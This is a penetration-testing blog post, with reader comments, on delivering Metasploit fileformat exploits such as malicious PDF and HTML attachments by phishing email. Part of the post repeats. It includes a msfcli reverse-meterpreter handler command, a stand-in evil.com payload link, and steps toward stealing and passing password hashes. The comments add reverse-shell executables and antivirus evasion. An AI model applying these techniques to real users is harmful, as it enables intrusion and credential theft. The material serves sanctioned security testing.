Video: Client-Sides, Social Engineering and Metasploit, Oh My!

It should be obvious to everyone that the bad guys are moving away from network level attacks and moving toward social engineering coupled with client-side attacks. In fact, this is the focus of the next ChicagoCon in May, where I will be presenting this exact topic live. Penetration testers need to be able to help an organization detect and respond to client-side attacks, and what better way to do that than to do a little client side exploitation during your pentests.

A new mixin has been added to the Metasploit Framework that allows the penetration tester to create and output the files that contain the exploit code instead of just serving up the exploit on a web page. This increases the attack surface by allowing the pentester to perform their Open Source Intelligence (OSINT) gathering to collect email addresses for the target domain. We then take those addresses and actually send the exploit to the victim as an attachment in the email versus a link to a website. Your mileage may very on the effectiveness of that technique, but in my experience people seem to be more apt to open attachments of “normal” or “non-malicious” type like .pdf and .html rather than clicking on links. Some example formats that can be used with the fileformat mixin are .pdf, .html, .cab, .m3u, .xpm, as well as others.

**This isn’t to say that some fileformat exploits can’t be delivered via the web. You can easily link to www.evil.com/evil.pdf, but some lend themselves to easier exploitation if you can get the file into a user’s inbox. So let’s take a quick look at how this can be accomplished.
For our example we’ll use a vulnerability in the ActiveX control for eTrust PestScan. Because this control is not marked safe for scripting, it wont run if a user browses to the page in the internet zone. But if they open a .html file that calls the vulnerable control we can execute code.

“This module exploits a stack overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.”

Fileformat bugs are going to require you to run the multi/handler, so you can catch the return shells.

cg@attack:~/evil/msf3$ ./msfcli
Usage: ./msfcli [mode]
====================================================
Mode Description
—- ———–
(H)elp You’re looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
cg@attack:~/evil/msf3$ ./msfcli exploit/multi/handler
PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.0.101 E
[*] Started reverse handler
[*] Starting the payload handler…

And now onto the video (another example of malicious pdfs in action) …

Video is in the process of moving to our YouTube Channel

Conclusion

With a combination of user interaction and the power of metasploit, we were able to grab password hashes. From here a jolt of 0phcrack, some rainbow tables, or pass the hash action and we’re off to completing our network pen test goals. This is a perfect example of electronically assisted social engineering, and how it can be a very effective addition to your toolset.

Extra Resources

Chris Gates, Sr Security Engineer, has been breaking things professionally for over a decade via Network & Web Application Penetration Testing, Red Teaming & Adversarial Simulation. These days Chris splits his time being both a breaker and fixer. Chris is the author of Metta, a tool for adversarial simulation and contributes to other open source projects. In the past he has spoken at the United States Military Academy, BlackHat, DefCon, Wild West Hacking Fest, Toorcon, Brucon, Troopers, SOURCE Boston, Derbycon, LasCon, HashDays, HackCon, Bsides ATL, IT Defense, OWASP AppSec DC, and Devops Days. Chris is also a cofounder of NoVAHackers. Blog: carnal0wnage.attackresearch.com Twitter: @carnal0wnage Talks: https://www.slideshare.net/chrisgates/

It should be obvious to everyone that the bad guys are moving away from network level attacks and moving toward social engineering coupled with client-side attacks. In fact, this is the focus of the next ChicagoCon in May, where I will be presenting this exact topic live. Penetration testers need to be able to help an organization detect and respond to client-side attacks, and what better way to do that than to do a little client side exploitation during your pentests.

A new mixin has been added to the Metasploit Framework that allows the penetration tester to create and output the files that contain the exploit code instead of just serving up the exploit on a web page. This increases the attack surface by allowing the pentester to perform their Open Source Intelligence (OSINT) gathering to collect email addresses for the target domain. We then take those addresses and actually send the exploit to the victim as an attachment in the email versus a link to a website. Your mileage may very on the effectiveness of that technique, but in my experience people seem to be more apt to open attachments of “normal” or “non-malicious” type like .pdf and .html rather than clicking on links. Some example formats that can be used with the fileformat mixin are .pdf, .html, .cab, .m3u, .xpm, as well as others.

**This isn’t to say that some fileformat exploits can’t be delivered via the web. You can easily link to http://www.evil.com/evil.pdf, but some lend themselves to easier exploitation if you can get the file into a user’s inbox. So let’s take a quick look at how this can be accomplished.

Great examples and video 🙂 I was playing with this stuff the other day with the office macros in Metasploit. It seemed to be quite effective. It’s amazing what folks will click on with a good backstory.

Like your other videos as well as this one, I’ve got to say nice work. It’s a good thing Metasploit has broadened its horizons and incorporated the use of fileformat exploits. I’d sure like your trunk by the way, 327 Exploits I only have 288 (I think…)

Thanks. I was testing this for a presentation but Symantec actually catches it. So, am trying the vbscript attack.

Sadly, there is a quirk with either Metasploit or BT3. Not sure which yet. When I run the /msfcli multi/handler PAYLOAD= LHOST= etc…, it runs the exploit and binds to IP=0.0.0.0 which is less than helpful.

Heh, I guess there was no reason to assume this would be that easy. ;D

Mine also binds to 0.0.0.0 as well but when testing this out. I created a malicious .exe using msfpayload. This was going to be a reverse meterpreter .exe that would shovel back a shell to a port on my box. So I set my LHOST similar to you when using exploit/multi/multi_handler and keyed exploit on my msfconsole, it said 0.0.0.0 however once i executed my .exe i recieved my reverse shell.

Bite the bullet and switch to Linux. I’m not sure why Moore and company waste time on the WIndows version as it is just a shadow of the msfconsole. Generally, when that stuff happened on Windows, I uninstalled and reinstalled and it would fix it.

Did you try uninstalling and reinstalling? When the MS08_067 exploit arrived, the update function would not pull everything properly. Or it wasn’t registering things correctly. This happened to several friends. The fastest fix I found was to uninstall and reinstall the app.

And sorry, didn’t mean to sound mean about the Window’s thing. I just gave up the windows version the other day. I tried to make it work until I wanted to practice backrounding a session and routing through it. It just doesn’t work properly in Windows. That’s all. I have found the WIndows interface to be buggy.